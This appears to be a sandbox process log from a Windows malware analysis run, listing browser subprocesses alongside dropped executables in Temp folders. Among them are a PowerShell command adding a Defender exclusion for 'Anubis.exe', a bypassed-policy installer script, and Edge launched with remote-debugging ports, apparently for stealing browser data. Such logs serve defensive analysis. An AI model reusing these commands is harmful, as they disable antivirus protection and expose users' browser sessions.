"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4412,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4772 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4040,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4724 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4956,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4976 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4416,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4980,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4500 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5152,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5300 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5436,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5444 /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\NyQ36niz\Anubis.exe""

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5308,i,6329724807692941535,12332321476229161723,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4484 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff1cad46f8,0x7fff1cad4708,0x7fff1cad4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,11841450538597994261,10552909746977913573,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1892 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,11841450538597994261,10552909746977913573,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,11841450538597994261,10552909746977913573,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,11841450538597994261,10552909746977913573,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,11841450538597994261,10552909746977913573,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,11841450538597994261,10552909746977913573,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2060,11841450538597994261,10552909746977913573,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0x7c,0x10c,0x7fff1cad46f8,0x7fff1cad4708,0x7fff1cad4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9656836629916281628,14139918828396097968,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0wuudza3\0wuudza3.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBA3.tmp" "c:\Users\Admin\AppData\Local\Temp\0wuudza3\CSC1EF009537F7B49569872AA9E2C834799.TMP"

C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe

"C:\Users\Admin\AppData\Local\Temp\10109710101\018c971c45.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff1cad46f8,0x7fff1cad4708,0x7fff1cad4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3316 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2780 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe

"C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3344 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe

"C:\Users\Admin\AppData\Local\Temp\10109720101\9de4ffc43e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 396 -p 3392 -ip 3392

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2708 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5028 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3760 /prefetch:2

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 212 -ip 212

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 2484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4296 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,7842180688452250095,15458761435520793672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2740 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff247a46f8,0x7fff247a4708,0x7fff247a4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2480 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe

"C:\Users\Admin\AppData\Local\Temp\10109730101\8d18e96742.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2504 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,520738765909682596,17289151312896282781,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2284 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

